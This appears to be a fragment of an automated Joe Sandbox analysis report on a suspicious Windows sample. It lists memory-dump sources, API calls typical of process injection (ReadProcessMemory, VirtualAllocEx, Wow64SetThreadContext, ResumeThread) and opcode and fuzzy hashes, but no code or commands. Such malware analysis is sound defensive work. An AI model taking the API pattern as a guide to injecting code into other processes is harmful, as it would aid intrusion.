                                                                                                      • Opcode ID: 18a019ce62d894aa0cdc5200f25c703302a1f34558f6e722d7adec91f1e180ab
                                                                                                      • Instruction ID: ca7e7ac5f3bf0d5eea5e3e187af08ebc446bf5c7d78507dc73100fd309b53778
                                                                                                      • Opcode Fuzzy Hash: 18a019ce62d894aa0cdc5200f25c703302a1f34558f6e722d7adec91f1e180ab
                                                                                                      • Instruction Fuzzy Hash: 952122759003499FDF10CFAAC880BEEBBF5BB88310F50842AE918A7650C7789954CBA4

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 260 277cc40-277d634 DuplicateHandle 262 277d636-277d63c 260->262 263 277d63d-277d65a 260->263 262->263
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0277D566,?,?,?,?,?), ref: 0277D627
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545258609.0000000002770000.00000040.00000800.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2770000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: 2419feeb04a0b9ff9bf026098dee5a1b382fbbedc2548425ccf2d31a48c241c6
                                                                                                      • Instruction ID: 8d9b49778168fcd2066e970818f4559ccab4bde74122a3903606796aa379bbbc
                                                                                                      • Opcode Fuzzy Hash: 2419feeb04a0b9ff9bf026098dee5a1b382fbbedc2548425ccf2d31a48c241c6
                                                                                                      • Instruction Fuzzy Hash: BB21E5B59002499FDB10CFAAD584ADEBBF9FB48710F14841AE918A3350D375A950CFA5

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 276 6d56840-6d568cd ReadProcessMemory 279 6d568d6-6d56906 276->279 280 6d568cf-6d568d5 276->280 280->279
                                                                                                      APIs
                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D568C0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 1726664587-0
                                                                                                      • Opcode ID: 56b7e5e784713a36c5745e1b5e035b2c092fa25e98585d3030a58520f26c80ac
                                                                                                      • Instruction ID: 309db97fad03794832ead7e14fa0b62143ef97888cf2dee46d94a66478bbddfc
                                                                                                      • Opcode Fuzzy Hash: 56b7e5e784713a36c5745e1b5e035b2c092fa25e98585d3030a58520f26c80ac
                                                                                                      • Instruction Fuzzy Hash: 56211671C003499FDB10DFAAC880BEEBBF5FF48310F50842AE918A7250D7799944DBA5

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 266 6d565b8-6d56603 268 6d56605-6d56611 266->268 269 6d56613-6d56643 Wow64SetThreadContext 266->269 268->269 271 6d56645-6d5664b 269->271 272 6d5664c-6d5667c 269->272 271->272
                                                                                                      APIs
                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D56636
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ContextThreadWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 983334009-0
                                                                                                      • Opcode ID: 10b5a9a664e6c1c7a2ff57190b38ff94423ab09582a9438b818625dd42db28e0
                                                                                                      • Instruction ID: 4aacaad4e87ba22d11375454907e0c7a2397ad69af506d450a310cac1bafb2a5
                                                                                                      • Opcode Fuzzy Hash: 10b5a9a664e6c1c7a2ff57190b38ff94423ab09582a9438b818625dd42db28e0
                                                                                                      • Instruction Fuzzy Hash: 17213571D003498FDB50DFAAC4857EEBBF4EF88620F54842ED819A7240CB78A945CFA4
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0277D566,?,?,?,?,?), ref: 0277D627
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545258609.0000000002770000.00000040.00000800.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2770000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: 547d05e95d7abacb5e91208bbfe12dc260aa3b7d057c701eaa2ac4d62b8f91e3
                                                                                                      • Instruction ID: 008111f3ccfb4eb37fc9a3e36d710d7a5a79c1b947daf1bf94bb700bff9a1307
                                                                                                      • Opcode Fuzzy Hash: 547d05e95d7abacb5e91208bbfe12dc260aa3b7d057c701eaa2ac4d62b8f91e3
                                                                                                      • Instruction Fuzzy Hash: 2C21E2B59002099FDB10CFAAD984ADEBBF4FB48720F14841AE918A3350D379A950CFA5
                                                                                                      APIs
                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D56636
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ContextThreadWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 983334009-0
                                                                                                      • Opcode ID: e20c5264f64cc213286a8db8a1dee0b867137efc82fa7fa30f40416acfbba810
                                                                                                      • Instruction ID: fc9966823056420d6740a440f7434022f29beb77a7a7198bf2a248171f623960
                                                                                                      • Opcode Fuzzy Hash: e20c5264f64cc213286a8db8a1dee0b867137efc82fa7fa30f40416acfbba810
                                                                                                      • Instruction Fuzzy Hash: 72215271D003098FDB10DFAAC4817AEBBF5EB88320F54842ED919A7290CB789945CFA4
                                                                                                      APIs
                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D568C0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 1726664587-0
                                                                                                      • Opcode ID: 4ff80014950c8f4fbdcf252071293312188e9ce754e45f166a7a5e9ee6a0f232
                                                                                                      • Instruction ID: 8897d00242b703a720503d75fba570951585afb79c5faf2a0836b2184096deeb
                                                                                                      • Opcode Fuzzy Hash: 4ff80014950c8f4fbdcf252071293312188e9ce754e45f166a7a5e9ee6a0f232
                                                                                                      • Instruction Fuzzy Hash: 01211471D003498FDB10DFAAC880BEEBBF5FF48310F50882AE919A7290D7799954DB65
                                                                                                      APIs
                                                                                                      • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,059627DA,?,?,?,?,?), ref: 0596287F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550532930.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5960000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFromIconResource
                                                                                                      • String ID:
                                                                                                      • API String ID: 3668623891-0
                                                                                                      • Opcode ID: 5ecbf37837bd6b31f7bfee87aecac84cb6532e25f9e7ed40fed6b8ee4a383e3c
                                                                                                      • Instruction ID: 36b41ff10cccdb513f478996c866429feffa6b3637fb43d1906cf1c0515cf4aa
                                                                                                      • Opcode Fuzzy Hash: 5ecbf37837bd6b31f7bfee87aecac84cb6532e25f9e7ed40fed6b8ee4a383e3c
                                                                                                      • Instruction Fuzzy Hash: 7B1126B580034D9FDB10DFAAC844BEEBFF8EB48720F14841AE914A7250C379A954DFA5
                                                                                                      APIs
                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D566FE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      APIs
                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D566FE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ResumeThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 947044025-0
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0277B326
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545258609.0000000002770000.00000040.00000800.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2770000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 4139908857-0
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0277B326
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545258609.0000000002770000.00000040.00000800.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2770000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 4139908857-0
                                                                                                      APIs
                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D591FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePost
                                                                                                      • String ID:
                                                                                                      • API String ID: 410705778-0
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ResumeThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 947044025-0
                                                                                                      APIs
                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D591FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePost
                                                                                                      • String ID:
                                                                                                      • API String ID: 410705778-0
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,059677C9,?,?), ref: 05967970
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550532930.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5960000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 2962429428-0
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,059677C9,?,?), ref: 05967970
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550532930.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5960000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 2962429428-0
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,059677C9,?,?), ref: 05967970
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550532930.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5960000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 2962429428-0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1544962187.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_d7d000_72STaC6BmljfbIQ.jbxd
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1544962187.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_d7d000_72STaC6BmljfbIQ.jbxd
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545002466.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_d8d000_72STaC6BmljfbIQ.jbxd
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545002466.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_d8d000_72STaC6BmljfbIQ.jbxd
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1544962187.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_d7d000_72STaC6BmljfbIQ.jbxd
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1544962187.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_d7d000_72STaC6BmljfbIQ.jbxd
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1544962187.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_d7d000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fcdc80419062b1f0612be5cddbd52667e740d12e065dfefece0a0f2537548e26
                                                                                                      • Instruction ID: 2e355e5112fbe7f9c9059e6a3fda8d36b619e0bc5ab9792d57768d74b775ab38
                                                                                                      • Opcode Fuzzy Hash: fcdc80419062b1f0612be5cddbd52667e740d12e065dfefece0a0f2537548e26
                                                                                                      • Instruction Fuzzy Hash: 5201F2710043489BE7144A25CDC0B66BBA9EF80726F28C51AEC4E4E282E3799840CBB2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1544962187.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_d7d000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7facc041abb088260f6796a2ea4f342b941723a7a816a841e6b546c4565c7ef7
                                                                                                      • Instruction ID: a87874b615024702cec4cbebe8866dd8cad53983c4d0aca5914311e635f5e86f
                                                                                                      • Opcode Fuzzy Hash: 7facc041abb088260f6796a2ea4f342b941723a7a816a841e6b546c4565c7ef7
                                                                                                      • Instruction Fuzzy Hash: EBF0CD32004344AEE7148E16C984B62FFE8EF90735F28C55AED0D4E282D279AC44CAB1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 63625468587238ac90f371c502d477f7c1cc207d5dc0c3ae41d9d4395c384320
                                                                                                      • Instruction ID: 187cd59fd5f1239e10e63b8696dc2a2bb003a69c1e7ce4680f1579431f96c051
                                                                                                      • Opcode Fuzzy Hash: 63625468587238ac90f371c502d477f7c1cc207d5dc0c3ae41d9d4395c384320
                                                                                                      • Instruction Fuzzy Hash: 31D1DD30B003508FEF65DB75C850B6EBBF6AF89700F194569D556CBAA0CB35E801CB61
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1549023590.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4dc0000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 21df31a5c142f73b328726bd70c45120acd2dcf508ceba48bc27ccf2a97f6e8f
                                                                                                      • Instruction ID: 83d63182579903d019d5b2d57c8e64c0ad409767d700c7176713f1c03e0cbe9f
                                                                                                      • Opcode Fuzzy Hash: 21df31a5c142f73b328726bd70c45120acd2dcf508ceba48bc27ccf2a97f6e8f
                                                                                                      • Instruction Fuzzy Hash: C41264F8501746EAD710CF66FA4C3893BA1FB85358BB0C309D2A15A2E5DBBD194ACF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 153f81aa53e93f4f7574a0851e4d247a04fbf11cf065f63350904c1783a83fc7
                                                                                                      • Instruction ID: b20d8309a5b2a1f6ed1ee02db05382b478943adc6882ad616baa8338e59d58ad
                                                                                                      • Opcode Fuzzy Hash: 153f81aa53e93f4f7574a0851e4d247a04fbf11cf065f63350904c1783a83fc7
                                                                                                      • Instruction Fuzzy Hash: 80E13A74E002598FDB14DFA9C681AAEFBF2FF89305F248169D815AB355C731A942CF60
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9d4d12f152a08bc70c8b3ba96bc7473a5a840250c2991e5f645965a52f0d97a6
                                                                                                      • Instruction ID: fa8fe01dfc6f585597dce1d74e928df96aec3efed105b40da213cded7e0fd4b5
                                                                                                      • Opcode Fuzzy Hash: 9d4d12f152a08bc70c8b3ba96bc7473a5a840250c2991e5f645965a52f0d97a6
                                                                                                      • Instruction Fuzzy Hash: 07E13C74E002598FDB14DFA9C581AAEFBF2FF89305F248169D815A7355C730A942CFA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f7b575252d68ff739181da98bdd3c87e107f8de8f55af1435a214cfbec1efb0d
                                                                                                      • Instruction ID: 5aaa879c619cd5019a81aa8575c24af3660916b0316e2fdce0e8c01e11159684
                                                                                                      • Opcode Fuzzy Hash: f7b575252d68ff739181da98bdd3c87e107f8de8f55af1435a214cfbec1efb0d
                                                                                                      • Instruction Fuzzy Hash: C7E12A74E002598FDB14DFA8D581AAEFBF2FF89305F248169D815AB355D730A942CFA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: be8067e5b0010ce62991149ddb6af1a74e136b7757fe23fbc5bf0e8fc18d0762
                                                                                                      • Instruction ID: de8bdbe050a20cca0bea823d7ad1331df63e49fbea7af7733ae7df90c41f3e23
                                                                                                      • Opcode Fuzzy Hash: be8067e5b0010ce62991149ddb6af1a74e136b7757fe23fbc5bf0e8fc18d0762
                                                                                                      • Instruction Fuzzy Hash: B1E13D74E002598FDB14DFA8C581AAEFBF2FF89304F248159D815A7315D730A942CFA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 32428fdca4446d4216d58c59916ecba07af9d3fa9d1798666b6c24ed3376bbfb
                                                                                                      • Instruction ID: 5b6b54485b9efa4900d9030b22830f19aca7a71ae337d81b16421c3a004030f4
                                                                                                      • Opcode Fuzzy Hash: 32428fdca4446d4216d58c59916ecba07af9d3fa9d1798666b6c24ed3376bbfb
                                                                                                      • Instruction Fuzzy Hash: 1FE11774E002598FDB14DFA9C581AAEFBF2FF89305F258169D815AB315D730A942CFA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1549023590.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4dc0000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 51c68ad4c7d669dc23afd71419c10f5a758f209da0b62965d314aa8b02ca112d
                                                                                                      • Instruction ID: 22f12fccfca37f47d669a4886b5397baaa83db42ee72397e8f39a00ba90d4f1e
                                                                                                      • Opcode Fuzzy Hash: 51c68ad4c7d669dc23afd71419c10f5a758f209da0b62965d314aa8b02ca112d
                                                                                                      • Instruction Fuzzy Hash: A7D1D331D10B5A8ADB00EBA4D994699B7B1FFD5300F21C79AE5093B254FB70AAC4CF91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1549023590.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4dc0000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d72f9f50f497c690d42c071f7907739681a335d5c5f78e504d12cabc2c11124f
                                                                                                      • Instruction ID: 81b3baf64eb28e854401342fae5f648f007d801a83ee1841a7cb4556cb0a5deb
                                                                                                      • Opcode Fuzzy Hash: d72f9f50f497c690d42c071f7907739681a335d5c5f78e504d12cabc2c11124f
                                                                                                      • Instruction Fuzzy Hash: E0D1D331D10B5A8ADB00EBA4D994699B771FFD5300F21C79AE5093B254FB70AAC4CF91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545258609.0000000002770000.00000040.00000800.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2770000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a4fd7ff415be88f138d8f8b91d12592725f907e99971f3bbc74fdd9dab857c49
                                                                                                      • Instruction ID: b41cbacb8f53c41bf3383fd8ee48030973cabe8f6fcf186e89cb35a1b271b0b4
                                                                                                      • Opcode Fuzzy Hash: a4fd7ff415be88f138d8f8b91d12592725f907e99971f3bbc74fdd9dab857c49
                                                                                                      • Instruction Fuzzy Hash: ADA17B36E002158FCF16DFB5C9845AEB7B2FF85304B25856AE815AB265EB31E905CF80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1549023590.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4dc0000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 18a3310e1c535b06a5b8ad10ac8319c7e24ebd3fb7ab8fceba8911dc6a2552ab
                                                                                                      • Instruction ID: 23857103eaebe5ad733879d53f5e4520482a4037c83570db9e258941c208e35d
                                                                                                      • Opcode Fuzzy Hash: 18a3310e1c535b06a5b8ad10ac8319c7e24ebd3fb7ab8fceba8911dc6a2552ab
                                                                                                      • Instruction Fuzzy Hash: BEC1E7B9901746EFD710CF66FA482897BB1FB85324B708309D2616B2E1DBBD184ACF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9c68fdd1ef832e2b0a68064e2153f31dee989b88ecb51de5738960250da36e33
                                                                                                      • Instruction ID: 366527ca1565c6c0660ae3bec8a52cd8ccc20c79a13f4a1e166c069efae5768a
                                                                                                      • Opcode Fuzzy Hash: 9c68fdd1ef832e2b0a68064e2153f31dee989b88ecb51de5738960250da36e33
                                                                                                      • Instruction Fuzzy Hash: 29515C70E042598FDB14CFA9C5815ADFBF2BF89204F25C1AAD818AB316D7319942CFA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
